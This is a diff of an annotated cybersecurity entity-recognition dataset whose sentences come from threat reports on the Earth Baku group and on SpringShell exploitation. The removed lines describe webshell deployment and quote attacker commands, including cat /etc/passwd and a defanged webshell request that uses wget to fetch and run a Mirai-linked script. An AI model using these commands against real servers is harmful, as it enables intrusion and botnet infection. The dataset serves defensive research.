beacon or ScrambleCross, a newly discovered backdoor.","entities":[{"id":47445,"label":"malware","start_offset":5,"end_offset":18},{"id":47448,"label":"malware","start_offset":93,"end_offset":106},{"id":47446,"label":"malware","start_offset":23,"end_offset":36},{"id":47447,"label":"tools","start_offset":69,"end_offset":82}],"relations":[{"id":326,"from_id":47446,"to_id":47447,"type":"uses"},{"id":327,"from_id":47446,"to_id":47448,"type":"uses"},{"id":328,"from_id":47445,"to_id":47447,"type":"uses"},{"id":329,"from_id":47445,"to_id":47448,"type":"uses"}],"Comments":[]} -{"id":2384,"text":"ScrambleCross receives instructions from its command-and-control (C&C) server that allow it to receive and manipulate plug-ins.","entities":[{"id":47449,"label":"malware","start_offset":0,"end_offset":13}],"relations":[],"Comments":[]} -{"id":2385,"text":"However, we have yet to retrieve and study one of these plug-ins.","entities":[],"relations":[],"Comments":[]} -{"id":2386,"text":"It has many of the same capabilities as another backdoor, Crosswalk, which has also been used by Earth Baku.","entities":[{"id":47451,"label":"threat-actor","start_offset":97,"end_offset":107},{"id":47450,"label":"malware","start_offset":58,"end_offset":67}],"relations":[{"id":330,"from_id":47451,"to_id":47450,"type":"uses"}],"Comments":[]} -{"id":2387,"text":"For example, both calculate the hash of the code section as an anti-bugging technique, both are designed as fully position-independent code, and both support various kinds of network communication protocols.","entities":[],"relations":[],"Comments":[]} -{"id":2388,"text":"Connections to other campaigns Earth Baku’s recent activities are related to another campaign that has been active since at least November 2018, as reported by FireEye and Positive Technologies.","entities":[{"id":45485,"label":"TIME","start_offset":130,"end_offset":143},{"id":45487,"label":"identity","start_offset":172,"end_offset":193},{"id":45486,"label":"identity","start_offset":160,"end_offset":167},{"id":45484,"label":"threat-actor","start_offset":31,"end_offset":41}],"relations":[],"Comments":[]} -{"id":2389,"text":"While the older campaign uses a different shellcode loader, which we have named LavagokLdr, we have observed similar code and procedures between LavagokLdr and StealthVector.","entities":[{"id":47452,"label":"malware","start_offset":80,"end_offset":90},{"id":47453,"label":"malware","start_offset":145,"end_offset":155},{"id":47454,"label":"malware","start_offset":160,"end_offset":173}],"relations":[],"Comments":[]} -{"id":2390,"text":"In the same vein, we have observed that LavagokLdr’s payload, Crosswalk, and one of StealthVector’s payloads, ScrambleCross, perform similar techniques for decryption and signature checking.","entities":[{"id":47455,"label":"malware","start_offset":40,"end_offset":50},{"id":47456,"label":"malware","start_offset":62,"end_offset":71},{"id":47458,"label":"malware","start_offset":110,"end_offset":123},{"id":47457,"label":"malware","start_offset":84,"end_offset":98}],"relations":[],"Comments":[]} -{"id":2391,"text":"But because Earth Baku has updated its toolset with StealthVector, StealthMutant, and ScrambleCross for this new campaign, we have identified it as its own separate operation.","entities":[{"id":45488,"label":"threat-actor","start_offset":12,"end_offset":22},{"id":45490,"label":"malware","start_offset":52,"end_offset":65},{"id":45491,"label":"malware","start_offset":67,"end_offset":80},{"id":45492,"label":"malware","start_offset":86,"end_offset":99}],"relations":[{"id":102,"from_id":45488,"to_id":45491,"type":"uses"},{"id":103,"from_id":45488,"to_id":45492,"type":"uses"},{"id":101,"from_id":45488,"to_id":45490,"type":"uses"}],"Comments":[]} -{"id":2392,"text":"Figure 2.","entities":[],"relations":[],"Comments":[]} -{"id":2393,"text":"A timeline of Earth Baku’s previous campaign as APT41 and its new campaign How Earth Baku creates its malware tools Earth Baku is known for its use of self-developed tools.","entities":[{"id":47459,"label":"threat-actor","start_offset":14,"end_offset":24},{"id":47460,"label":"threat-actor","start_offset":48,"end_offset":53},{"id":47461,"label":"threat-actor","start_offset":79,"end_offset":89},{"id":47462,"label":"threat-actor","start_offset":116,"end_offset":126}],"relations":[{"id":331,"from_id":47459,"to_id":47460,"type":"duplicate-of"}],"Comments":[]} -{"id":2394,"text":"To continue doing so, it appears to be filling its ranks with malicious actors who are pooling their diverse skills.","entities":[],"relations":[],"Comments":[]} -{"id":2395,"text":"Interestingly, the new malware tools involved in Earth Baku’s new campaign indicates that the APT group has likely recruited members who specialize in low-level programming, software development, and red-team techniques.","entities":[{"id":47463,"label":"threat-actor","start_offset":49,"end_offset":59}],"relations":[],"Comments":[]} -{"id":2396,"text":"For more details about Earth Baku’s new campaign, read our research paper \"Earth Baku: An APT Group Targeting Indo-Pacific Countries With New Stealth Loaders and Backdoor.\" Tags Articles, News, Reports | APT & Targeted Attacks | Research","entities":[{"id":47464,"label":"threat-actor","start_offset":23,"end_offset":34},{"id":47465,"label":"threat-actor","start_offset":75,"end_offset":85},{"id":47466,"label":"location","start_offset":110,"end_offset":122}],"relations":[],"Comments":[]} -{"id":2397,"text":"This post is also available in: 日本語 (Japanese) Recently, two vulnerabilities were announced within the Spring Framework, an open-source framework for building enterprise Java applications.","entities":[{"id":47467,"label":"SOFTWARE","start_offset":109,"end_offset":125}],"relations":[],"Comments":[]} -{"id":2398,"text":"On March 29, 2022, the Spring Cloud Expression Resource Access Vulnerability tracked in CVE-2022-22963 was patched with the release of Spring Cloud Function 3.1.7 and 3.2.3.","entities":[{"id":47468,"label":"TIME","start_offset":3,"end_offset":17},{"id":47470,"label":"vulnerability","start_offset":88,"end_offset":102},{"id":47469,"label":"vulnerability","start_offset":23,"end_offset":76},{"id":47471,"label":"SOFTWARE","start_offset":135,"end_offset":172}],"relations":[{"id":332,"from_id":47471,"to_id":47470,"type":"has"}],"Comments":[]} -{"id":2399,"text":"Two days later on March 31, 2022, Spring released version 5.3.18 and 5.2.20 of Spring Framework to patch another more severe vulnerability tracked in CVE-2022-22965.","entities":[{"id":47472,"label":"TIME","start_offset":18,"end_offset":32},{"id":47473,"label":"SOFTWARE","start_offset":34,"end_offset":40},{"id":47474,"label":"SOFTWARE","start_offset":79,"end_offset":95},{"id":47475,"label":"vulnerability","start_offset":150,"end_offset":164}],"relations":[{"id":333,"from_id":47474,"to_id":47475,"type":"has"}],"Comments":[]} -{"id":2400,"text":"The CVE-2022-22965 vulnerability allows an attacker unauthenticated remote code execution (RCE), which Unit 42 has observed being exploited in the wild.","entities":[{"id":45495,"label":"vulnerability","start_offset":4,"end_offset":18},{"id":45496,"label":"attack-pattern","start_offset":52,"end_offset":89},{"id":45497,"label":"identity","start_offset":103,"end_offset":110}],"relations":[{"id":105,"from_id":45496,"to_id":45495,"type":"delivers"}],"Comments":[]} -{"id":2401,"text":"The exploitation of this vulnerability could result in a webshell being installed onto the compromised server that allows further command execution.","entities":[],"relations":[],"Comments":[]} -{"id":2402,"text":"Because the Spring Framework is widely used for web system development and the severity of the vulnerability is critical (CVSS score of 9.8), CVE-2022-22965 is given the name SpringShell (and\/or Spring4Shell) by the infosec community.","entities":[{"id":47477,"label":"vulnerability","start_offset":142,"end_offset":156},{"id":47478,"label":"vulnerability","start_offset":175,"end_offset":186},{"id":47476,"label":"SOFTWARE","start_offset":12,"end_offset":28},{"id":47479,"label":"vulnerability","start_offset":195,"end_offset":207}],"relations":[],"Comments":[]} -{"id":2403,"text":"To understand the impact of this vulnerability, we analyzed all the available information and located the issue in the source code.","entities":[],"relations":[],"Comments":[]} -{"id":2404,"text":" On April 8, we updated this blog to include statistics on SpringShell exploitation attempts that we identified by analyzing hits on the Spring Core Remote Code Execution Vulnerability threat prevention signature for the Palo Alto Networks Next-Generation Firewall, as well as alerts triggered in Cortex XDR.","entities":[{"id":47484,"label":"SOFTWARE","start_offset":297,"end_offset":307},{"id":47480,"label":"TIME","start_offset":4,"end_offset":11},{"id":47481,"label":"vulnerability","start_offset":59,"end_offset":70},{"id":47482,"label":"vulnerability","start_offset":137,"end_offset":184},{"id":47483,"label":"SOFTWARE","start_offset":221,"end_offset":264}],"relations":[{"id":334,"from_id":47481,"to_id":47482,"type":"related-to"}],"Comments":[]} -{"id":2405,"text":"We also added a section on indicators.","entities":[],"relations":[],"Comments":[]} -{"id":2406,"text":" Palo Alto Networks customers receive protections against CVE-2022-22965 and CVE-2022-22963 via products and services including Cortex XDR Prevent and Pro, a Threat Prevention subscription for the Next-Generation Firewall, and Prisma Cloud Compute.","entities":[{"id":45498,"label":"identity","start_offset":1,"end_offset":19},{"id":45499,"label":"vulnerability","start_offset":58,"end_offset":72},{"id":45501,"label":"SOFTWARE","start_offset":128,"end_offset":154},{"id":45502,"label":"SOFTWARE","start_offset":227,"end_offset":247},{"id":45500,"label":"vulnerability","start_offset":77,"end_offset":91}],"relations":[],"Comments":[]} -{"id":2407,"text":"Affected Software and Versions Background on the Spring Framework Root Cause Analysis for CVE-2022-22965","entities":[{"id":47486,"label":"vulnerability","start_offset":90,"end_offset":104},{"id":47485,"label":"SOFTWARE","start_offset":49,"end_offset":65}],"relations":[{"id":335,"from_id":47485,"to_id":47486,"type":"has"}],"Comments":[]} -{"id":2408,"text":"Background on Exploitation of the Class Loader Establishing a Reverse Shell Connection to a Remote Server on the Compromised Server SpringShell Exploit Observed in the Wild Conclusion","entities":[{"id":47488,"label":"vulnerability","start_offset":132,"end_offset":143},{"id":47487,"label":"attack-pattern","start_offset":47,"end_offset":86}],"relations":[],"Comments":[]} -{"id":2409,"text":"Additional Resources Indicators Existing proofs of concept (PoCs) for exploitation work under the following conditions: Any Java application using Spring Beans packet (spring-beans-*.jar) and using Spring parameters binding could be affected by this vulnerability.","entities":[{"id":45503,"label":"SOFTWARE","start_offset":150,"end_offset":162},{"id":45504,"label":"SOFTWARE","start_offset":201,"end_offset":207},{"id":45505,"label":"SOFTWARE","start_offset":127,"end_offset":143},{"id":47489,"label":"FILEPATH","start_offset":171,"end_offset":189}],"relations":[],"Comments":[]} -{"id":2410,"text":" The Spring Framework is an open-source application framework and inversion of the control container for the Java platform.","entities":[{"id":47490,"label":"SOFTWARE","start_offset":5,"end_offset":21}],"relations":[],"Comments":[]} -{"id":2411,"text":"It is widely used in the industry by various programs and systems due to its powerful features and ease of use.","entities":[],"relations":[],"Comments":[]} -{"id":2412,"text":"Some well-known products such as Spring Boot and Spring Cloud are developed with the Spring Framework.","entities":[{"id":45506,"label":"SOFTWARE","start_offset":33,"end_offset":44},{"id":45508,"label":"SOFTWARE","start_offset":85,"end_offset":101},{"id":45507,"label":"SOFTWARE","start_offset":49,"end_offset":61}],"relations":[],"Comments":[]} -{"id":2413,"text":" The Spring Core (spring-core) is the core of the framework that provides powerful features such as inversion of control and dependency injection.","entities":[{"id":47491,"label":"SOFTWARE","start_offset":5,"end_offset":16}],"relations":[],"Comments":[]} -{"id":2414,"text":"It contains the core, beans, context and Spring Expression Language (SpEL) modules.","entities":[{"id":47492,"label":"SOFTWARE","start_offset":41,"end_offset":74}],"relations":[],"Comments":[]} -{"id":2415,"text":" The vulnerability is caused by the getCachedIntrospectionResults method of the Spring framework wrongly exposing the class object when binding the parameters.","entities":[{"id":45509,"label":"SOFTWARE","start_offset":80,"end_offset":96}],"relations":[],"Comments":[]} -{"id":2416,"text":" The default Spring data binding mechanism allows developers to bind HTTP request details to application-specific objects.","entities":[{"id":47493,"label":"SOFTWARE","start_offset":13,"end_offset":19}],"relations":[],"Comments":[]} -{"id":2417,"text":"For example, there is a simple classical application scenario in which the developer creates a trade object to capture request parameters as shown in Figure 1.","entities":[],"relations":[],"Comments":[]} -{"id":2418,"text":" Then the developer creates a controller to use the object trade as shown in Figure 2. After that, the developer usually creates a request builder for the trade controller, which allows the web user to access the trade object remotely as shown in Figure 3.","entities":[],"relations":[],"Comments":[]} -{"id":2419,"text":" When web users access trade object properties, the binding process (bindRequestParameters) in the Spring framework implementation will call the getCachedIntrospectionResults method to get and set the object property in the cache.","entities":[{"id":47494,"label":"SOFTWARE","start_offset":99,"end_offset":115}],"relations":[],"Comments":[]} -{"id":2420,"text":"However, the return object of the getCachedIntrospectionResults method includes a class object.","entities":[],"relations":[],"Comments":[]} -{"id":2421,"text":"This means that web users can get a class object remotely by simply submitting a URL as shown in Figure 4.","entities":[],"relations":[],"Comments":[]} +{"id":9100,"text":"Stealth was already a fixture in their operations.","entities":[],"relations":[],"Comments":[]} +{"id":8125,"text":"In reality, that is just an overlay screen that is displayed on top of all activity windows on the device.","entities":[{"id":25165,"label":"identity","start_offset":20,"end_offset":24}],"relations":[],"Comments":[]} +{"id":1965,"text":"The DTLS protocol is used by Microsoft Windows Remote Desktop Gateway (RDG) to establish a secure channel between the RDG client and RDG server (described in detail in [MS_TSGU].pdf). The RDG client initiates the DTLS connection by sending a ClientHello to the RDG Server. The RDG server then responds with a DTLS Hello Verify Request that contains a cookie; this is used as a denial of service countermeasure.","entities":[{"id":47089,"label":"SOFTWARE","start_offset":29,"end_offset":75},{"id":47090,"label":"FILEPATH","start_offset":168,"end_offset":181}],"relations":[],"Comments":[]} +{"id":4432,"text":"PipeCommunication pipeCommunication = new PipeCommunication(true, text); bool flag = false; while (!flag)","entities":[],"relations":[],"Comments":[]} +{"id":4071,"text":"HTShell supports importing additional config files.","entities":[{"id":49909,"label":"malware","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} +{"id":8147,"text":"Customized encoding routine done Relation to SideWinder","entities":[],"relations":[],"Comments":[]} +{"id":7298,"text":"Third-stage payload","entities":[],"relations":[],"Comments":[]} +{"id":160,"text":"Although that feature was never enabled to protect user data files like ransomware targets, there is a clear lesson from the experience: too many security checks on user activity fails in the end.","entities":[],"relations":[],"Comments":[]} +{"id":5061,"text":"In mid-March, a security researcher released a blog post detailing a 'Browser in the Browser' phishing technique.","entities":[{"id":51167,"label":"TIME","start_offset":3,"end_offset":12}],"relations":[],"Comments":[]} {"id":2422,"text":" Exposing the class object to web users is very dangerous and can lead to RCE in many ways.","entities":[],"relations":[],"Comments":[]} -{"id":2423,"text":"The class loader is often used by exploiting payloads to load some sensitive classes dynamically for object modification and code execution.","entities":[{"id":47495,"label":"attack-pattern","start_offset":34,"end_offset":53}],"relations":[],"Comments":[]} -{"id":2424,"text":"One easy way to get RCE is using the exposed class loader to modify the Tomcat log configuration and remotely upload a JSP web shell after changing the Tomcat log configuration.","entities":[{"id":45511,"label":"SOFTWARE","start_offset":152,"end_offset":158},{"id":7258,"label":"attack-pattern","start_offset":123,"end_offset":132},{"id":47496,"label":"SOFTWARE","start_offset":72,"end_offset":78}],"relations":[],"Comments":[]} -{"id":2425,"text":"One example of changing the Tomcat log configuration by simply submitting a URL is shown in Figure 5.","entities":[{"id":47497,"label":"SOFTWARE","start_offset":28,"end_offset":34}],"relations":[],"Comments":[]} -{"id":2426,"text":"This is the exploit method used in the public PoC for the SpringShell vulnerability.","entities":[{"id":47498,"label":"vulnerability","start_offset":58,"end_offset":83}],"relations":[],"Comments":[]} -{"id":2427,"text":"Early in 2010, CVE-2010-1622 was assigned to a remote code execution vulnerability in the Spring Framework.","entities":[{"id":45513,"label":"vulnerability","start_offset":15,"end_offset":28},{"id":45514,"label":"SOFTWARE","start_offset":90,"end_offset":106},{"id":45515,"label":"attack-pattern","start_offset":47,"end_offset":68},{"id":45512,"label":"TIME","start_offset":0,"end_offset":13}],"relations":[{"id":106,"from_id":45514,"to_id":45513,"type":"has"},{"id":107,"from_id":45515,"to_id":45513,"type":"uses"}],"Comments":[]} -{"id":2428,"text":"This vulnerability was due to the lack of proper check on the provided PropertyDescriptor in CachedIntrospectionResults() so that class.classLoader is allowed to be utilized to modify the search path of the system's class loader and cause the program to invoke remote Java code.","entities":[],"relations":[],"Comments":[]} -{"id":2429,"text":"For this vulnerability, the class loader plays a vital role in the exploitation.","entities":[],"relations":[],"Comments":[]} -{"id":2430,"text":" In the Spring Framework version 2.5.6.SEC02, the vulnerability was fixed.","entities":[{"id":45516,"label":"SOFTWARE","start_offset":9,"end_offset":44}],"relations":[],"Comments":[]} -{"id":2431,"text":"However, while the original way of obtaining the class loader and exploiting it no longer works, a new feature of JDK was introduced in version 9, providing another way to obtain the class loader and making the exploit possible again.","entities":[{"id":47499,"label":"SOFTWARE","start_offset":114,"end_offset":117}],"relations":[],"Comments":[]} -{"id":2432,"text":" The code snippet seen in Figure 6 shows the fix to CVE-2010-1622.","entities":[{"id":47500,"label":"vulnerability","start_offset":52,"end_offset":65}],"relations":[],"Comments":[]} -{"id":2433,"text":"The fix is to use a block list to exclude two methods: Class.getClassLoader() and getProtectionDomain() as highlighted in Figure 6.","entities":[],"relations":[],"Comments":[]} -{"id":2434,"text":"But using a block list runs the risk of being bypassed by the cases not on the list.","entities":[],"relations":[],"Comments":[]} -{"id":2435,"text":"And the Java 9 Platform Module System (JPMS) provides a way to bypass this block list.","entities":[{"id":47501,"label":"SOFTWARE","start_offset":8,"end_offset":43}],"relations":[],"Comments":[]} -{"id":2436,"text":" The newly added module property makes it possible to modify the logging configuration so that a JSP webshell can be written into the web host folder via the logging function as shown in Figure 7.","entities":[{"id":47502,"label":"SOFTWARE","start_offset":97,"end_offset":100},{"id":47503,"label":"attack-pattern","start_offset":101,"end_offset":109}],"relations":[],"Comments":[]} -{"id":2437,"text":" Figure 8 shows the payload drops a password-protected webshell in the Tomcat ROOT directory called shell7.jsp.","entities":[{"id":47504,"label":"SOFTWARE","start_offset":71,"end_offset":77},{"id":47505,"label":"FILEPATH","start_offset":100,"end_offset":110}],"relations":[],"Comments":[]} -{"id":2438,"text":" Attackers can then invoke any command through the JSP webshell.","entities":[{"id":47507,"label":"attack-pattern","start_offset":55,"end_offset":63},{"id":47506,"label":"SOFTWARE","start_offset":51,"end_offset":54}],"relations":[],"Comments":[]} -{"id":2439,"text":"Figure 9 shows the example of executing Netcat to establish a reverse shell to a remote server on the compromised server.","entities":[{"id":7297,"label":"tools","start_offset":40,"end_offset":46},{"id":47508,"label":"attack-pattern","start_offset":50,"end_offset":75}],"relations":[],"Comments":[]} -{"id":2440,"text":" Exploit code for this remote code execution vulnerability has been made publicly available.","entities":[{"id":47509,"label":"attack-pattern","start_offset":23,"end_offset":44}],"relations":[],"Comments":[]} -{"id":2441,"text":"Unit 42 first observed scanning traffic early on March 30, 2022 with HTTP requests to servers that included the test strings within the URL.","entities":[{"id":47510,"label":"identity","start_offset":0,"end_offset":7},{"id":47511,"label":"TIME","start_offset":49,"end_offset":63}],"relations":[],"Comments":[]} -{"id":2442,"text":"Figure 10 shows an example of the early scanning activity.","entities":[],"relations":[],"Comments":[]} -{"id":2443,"text":" While testing our Threat Prevention signatures, we observed additional scanning activity that included the exploit code within the data section of the HTTP POST request, as seen in Figure 11.","entities":[],"relations":[],"Comments":[]} -{"id":2444,"text":" Once we deployed the Threat Prevention signatures, we analyzed the packet captures associated with our \"Spring Core Remote Code Execution Vulnerability\" signature and found that a majority of the activity was likely generated by variations of the publicly available PoC tools.","entities":[{"id":47512,"label":"vulnerability","start_offset":105,"end_offset":152}],"relations":[],"Comments":[]} -{"id":2445,"text":"Our analysis shows that the following filenames would store the webshell contents on the server in the event of successful exploitation: 0xd0m7.jsp myshell.jsp shell.jsp tomcatwar.jsp wpz.jsp The webshell contents written to these files are very similar to the code included in the publicly available PoC as well.","entities":[{"id":47515,"label":"FILEPATH","start_offset":161,"end_offset":170},{"id":47516,"label":"FILEPATH","start_offset":171,"end_offset":184},{"id":47513,"label":"FILEPATH","start_offset":138,"end_offset":148},{"id":47514,"label":"FILEPATH","start_offset":149,"end_offset":160},{"id":47517,"label":"FILEPATH","start_offset":185,"end_offset":192}],"relations":[],"Comments":[]} -{"id":2446,"text":"There are two variants of the webshell.","entities":[],"relations":[],"Comments":[]} -{"id":2447,"text":"One was included in the PoC and uses the pwd parameter for authentication (password is always j) and the cmd parameter for the command to execute.","entities":[],"relations":[],"Comments":[]} -{"id":2448,"text":"The second variant does not use a parameter for authentication and uses id for the command to execute.","entities":[],"relations":[],"Comments":[]} -{"id":2449,"text":"Table 1 shows the parameters that the webshell saved to the server would use for authentication and command and how many times we saw them.","entities":[],"relations":[],"Comments":[]} -{"id":2450,"text":" Table 1. Parameters used by webshells seen in hits on \"Spring Core Remote Code Execution Vulnerability\" signature.","entities":[{"id":47518,"label":"vulnerability","start_offset":56,"end_offset":103},{"id":47519,"label":"attack-pattern","start_offset":29,"end_offset":38}],"relations":[],"Comments":[]} -{"id":2451,"text":" We searched our telemetry for activity to webshells using the file names associated with the SpringShell activity, with the noted exception of shell.jsp, which is far too general.","entities":[{"id":45518,"label":"FILEPATH","start_offset":144,"end_offset":153},{"id":45517,"label":"vulnerability","start_offset":94,"end_offset":105}],"relations":[],"Comments":[]} -{"id":2452,"text":"We have seen the unique commands listed below submitted to webshells.","entities":[{"id":47520,"label":"attack-pattern","start_offset":59,"end_offset":67}],"relations":[],"Comments":[]} -{"id":2453,"text":"Of these, only the two commands involving \/etc\/passwd would possibly suggest malicious intent for exploitation – the rest of the commands suggest general scanning activity.","entities":[{"id":47521,"label":"FILEPATH","start_offset":42,"end_offset":53}],"relations":[],"Comments":[]} -{"id":2454,"text":"ls nslookup%20[redacted].test6.ggdd[.]co[.]uk nslookup+[redacted].test6.ggdd[.]co[.]uk ping%20[redacted].test6.ggdd[.]co[.]uk ping+[redacted].test6.ggdd[.]co[.]uk whoami cat%20\/etc\/passwd cat+\/etc\/passwd id ifconfig ipconfig ping%20[redacted].burpcollaborator[.]net ","entities":[{"id":45521,"label":"FILEPATH","start_offset":192,"end_offset":203},{"id":45522,"label":"DOMAIN","start_offset":233,"end_offset":265},{"id":45523,"label":"DOMAIN","start_offset":131,"end_offset":161},{"id":45524,"label":"DOMAIN","start_offset":14,"end_offset":45},{"id":45525,"label":"DOMAIN","start_offset":55,"end_offset":86},{"id":45520,"label":"FILEPATH","start_offset":176,"end_offset":187},{"id":45526,"label":"DOMAIN","start_offset":94,"end_offset":125},{"id":7335,"label":"tools","start_offset":207,"end_offset":215},{"id":7336,"label":"tools","start_offset":216,"end_offset":224},{"id":47522,"label":"tools","start_offset":163,"end_offset":169},{"id":47523,"label":"tools","start_offset":46,"end_offset":54},{"id":47525,"label":"tools","start_offset":87,"end_offset":91},{"id":47526,"label":"tools","start_offset":126,"end_offset":130},{"id":47524,"label":"tools","start_offset":3,"end_offset":11},{"id":47527,"label":"tools","start_offset":225,"end_offset":229}],"relations":[],"Comments":[]} -{"id":2455,"text":"Our Spring Core Remote Code Execution Vulnerability signature was released in the early hours of March 31.","entities":[{"id":47528,"label":"vulnerability","start_offset":4,"end_offset":51},{"id":47529,"label":"TIME","start_offset":82,"end_offset":105}],"relations":[],"Comments":[]} -{"id":2456,"text":"On April 7, we collected the seven days’ worth of activity since the signature release and found that the signature had triggered 43,092 times.","entities":[{"id":47530,"label":"TIME","start_offset":3,"end_offset":10}],"relations":[],"Comments":[]} -{"id":2457,"text":"Figure 12 shows the steady increase of total hits from March 31 until April 3, a fairly significant decrease on April 4, followed by an incline in activity on April 5 and 6.","entities":[{"id":45527,"label":"TIME","start_offset":55,"end_offset":63},{"id":45528,"label":"TIME","start_offset":70,"end_offset":77},{"id":45529,"label":"TIME","start_offset":112,"end_offset":119},{"id":45530,"label":"TIME","start_offset":159,"end_offset":172}],"relations":[],"Comments":[]} -{"id":2458,"text":"At this time, we have yet to confirm any successful exploitation attempts that led to a webshell installed onto the server outside of testing activity using purposefully vulnerable applications.","entities":[],"relations":[],"Comments":[]} -{"id":2459,"text":" We observed a large amount of unique IP addresses during our analysis – with 2,056 addresses triggering the Spring Core Remote Code Execution Vulnerability signature.","entities":[{"id":47531,"label":"vulnerability","start_offset":109,"end_offset":156}],"relations":[],"Comments":[]} -{"id":2460,"text":"Table 2 shows the top 15 IP addresses seen as the source that triggered our signature, which accounts for just over 50% of all of the activity we observed.","entities":[],"relations":[],"Comments":[]} -{"id":2461,"text":" Table 2. Top 15 source IPs triggering the Spring Core Remote Code Execution Vulnerability signature.","entities":[{"id":47532,"label":"vulnerability","start_offset":43,"end_offset":90}],"relations":[],"Comments":[]} -{"id":2462,"text":" We were able to analyze 31,953 packet captures that triggered the Spring Core Remote Code Execution Vulnerability signature to determine the webshell filenames and the webshell contents that would be saved to the server in the event of successful exploitation.","entities":[{"id":47533,"label":"vulnerability","start_offset":67,"end_offset":114},{"id":47534,"label":"attack-pattern","start_offset":142,"end_offset":150},{"id":47535,"label":"attack-pattern","start_offset":169,"end_offset":177}],"relations":[],"Comments":[]} -{"id":2463,"text":"In many cases, the webshell file names had .jsp extensions, which would allow for a successful exploitation to install a working webshell.","entities":[{"id":47536,"label":"attack-pattern","start_offset":129,"end_offset":137}],"relations":[],"Comments":[]} -{"id":2464,"text":"However, in many cases the filename had an extension that would not support a webshell, such as .js and .txt, which we believe was used just to mark the presence of a successful file upload as part of vulnerable server discovery efforts.","entities":[],"relations":[],"Comments":[]} -{"id":2465,"text":"At the time of writing, we have observed 95 unique webshell filenames, which we have included in the indicators section.","entities":[],"relations":[],"Comments":[]} -{"id":2466,"text":" A majority of the activity used the tomcarwar.jsp filename that was used in the initial PoC script, which accounted for over 57% of the filenames observed.","entities":[],"relations":[],"Comments":[]} -{"id":2467,"text":"In fact, the top three filenames – tomcarwar.jsp, checkexploit.jsp and javatestfila.jsp – account for over 84% of the activity with known webshell filenames.","entities":[{"id":47537,"label":"FILEPATH","start_offset":35,"end_offset":48},{"id":47539,"label":"FILEPATH","start_offset":71,"end_offset":87},{"id":47538,"label":"FILEPATH","start_offset":50,"end_offset":66},{"id":47540,"label":"attack-pattern","start_offset":138,"end_offset":146}],"relations":[],"Comments":[]} -{"id":2468,"text":"The pie chart in Figure 13 shows a high-level breakdown of the most common filenames.","entities":[],"relations":[],"Comments":[]} -{"id":2469,"text":" A majority of the packets we analyzed showed the webshell contents did not differ far from the webshell seen in the original proof-of-concept script, which can be seen in Figure 14.","entities":[],"relations":[],"Comments":[]} -{"id":2470,"text":"Another very common webshell seen within our telemetry is the exact same with different HTTP parameters and values used by the webshell, as seen in Figure 15.","entities":[{"id":47542,"label":"attack-pattern","start_offset":20,"end_offset":28},{"id":47541,"label":"attack-pattern","start_offset":127,"end_offset":135}],"relations":[],"Comments":[]} -{"id":2471,"text":" We also observed a significant amount of exploit attempts using content that again was a modification of the initial webshell in the proof-of-concept.","entities":[{"id":47543,"label":"attack-pattern","start_offset":119,"end_offset":127}],"relations":[],"Comments":[]} -{"id":2472,"text":"Figure 16 shows the contents that we observed in the wild, which should not be considered a webshell as it does nothing more than display SPRING_CORE_RCE.","entities":[{"id":47544,"label":"attack-pattern","start_offset":92,"end_offset":100}],"relations":[],"Comments":[]} -{"id":2473,"text":"The lack of webshell functionality suggests that this is likely uploaded by scanners attempting to discover servers vulnerable to SpringShell.","entities":[{"id":47545,"label":"attack-pattern","start_offset":12,"end_offset":20},{"id":47546,"label":"vulnerability","start_offset":130,"end_offset":141}],"relations":[],"Comments":[]} -{"id":2474,"text":" More recently, we have seen an uptick in webshell content as seen in Figure 17, which is related to another proof-of-concept script created by K3rwin.","entities":[{"id":47547,"label":"identity","start_offset":144,"end_offset":150}],"relations":[],"Comments":[]} -{"id":2475,"text":"This particular webshell will load a base64 encoded class that will contain the functionality desired by the actor.","entities":[],"relations":[],"Comments":[]} -{"id":2476,"text":"This particular webshell is based on AntSword’s shell.jsp, which was modified to use a parameter of k3rwin instead of ant to load the class.","entities":[{"id":7400,"label":"tools","start_offset":37,"end_offset":45},{"id":47549,"label":"identity","start_offset":100,"end_offset":106},{"id":47548,"label":"FILEPATH","start_offset":48,"end_offset":57}],"relations":[{"id":336,"from_id":7400,"to_id":47548,"type":"consists-of"}],"Comments":[]} -{"id":2477,"text":" The only malicious activity we have seen in our telemetry related to SpringShell involves HTTP requests to URLs containing the tomcatwar.jsp filename associated with the SpringShell proof-of-concept script.","entities":[{"id":47550,"label":"vulnerability","start_offset":70,"end_offset":81},{"id":47551,"label":"FILEPATH","start_offset":128,"end_offset":141},{"id":47552,"label":"vulnerability","start_offset":171,"end_offset":182}],"relations":[],"Comments":[]} -{"id":2478,"text":"The activity involved parameters issued to the webshell that would run a command to download and execute a script from a remote server as seen in the following: [redacted IPV4 address]:8080\/tomcatwar.jsp?pwd=j&cmd=\/bin\/sh\/-c${IFS}'cd${IFS}\/tmp;wget${IFS}hxxp:\/\/107.174.133[.]167\/t.sh${IFS}-O-%a6sh${IFS}SpringCore;' ","entities":[{"id":45532,"label":"URL","start_offset":162,"end_offset":317}],"relations":[],"Comments":[]} -{"id":2479,"text":"Upon further analysis, the t.sh script hosted on this remote server is related to the Mirai botnet.","entities":[{"id":47554,"label":"FILEPATH","start_offset":27,"end_offset":31},{"id":47553,"label":"malware","start_offset":86,"end_offset":98}],"relations":[],"Comments":[]} -{"id":2480,"text":"The requests above were sent from the IP address ​​194.31.98[.]186, which itself has hosted payloads associated with Mirai as well.","entities":[{"id":47555,"label":"IPV4","start_offset":51,"end_offset":66},{"id":47556,"label":"malware","start_offset":117,"end_offset":122}],"relations":[],"Comments":[]} -{"id":2481,"text":"Inbound attempts to exploit the SpringShell vulnerability from 194.31.98[.]186 attempted to install the webshell from the original proof-of-concept seen in Figure 14.","entities":[{"id":45533,"label":"IPV4","start_offset":63,"end_offset":78},{"id":47557,"label":"attack-pattern","start_offset":104,"end_offset":112},{"id":47558,"label":"vulnerability","start_offset":32,"end_offset":43}],"relations":[],"Comments":[]} -{"id":2482,"text":"Our signatures blocked the initial attempt to exploit the vulnerability so we cannot confirm if Mirai’s attempts to exploit SpringShell have been successful.","entities":[{"id":47559,"label":"malware","start_offset":96,"end_offset":101},{"id":47560,"label":"vulnerability","start_offset":124,"end_offset":135}],"relations":[],"Comments":[]} -{"id":2483,"text":"Both Netlab 360 and Trend Micro also observed Mirai activity related to the SpringShell vulnerability.","entities":[{"id":47561,"label":"identity","start_offset":5,"end_offset":15},{"id":47562,"label":"identity","start_offset":20,"end_offset":31},{"id":47563,"label":"malware","start_offset":46,"end_offset":51},{"id":47564,"label":"vulnerability","start_offset":76,"end_offset":101}],"relations":[],"Comments":[]} -{"id":2484,"text":"In addition to our threat prevention signatures, we analyzed the alerts triggered in Cortex XDR and found 116 events between April 4 and April 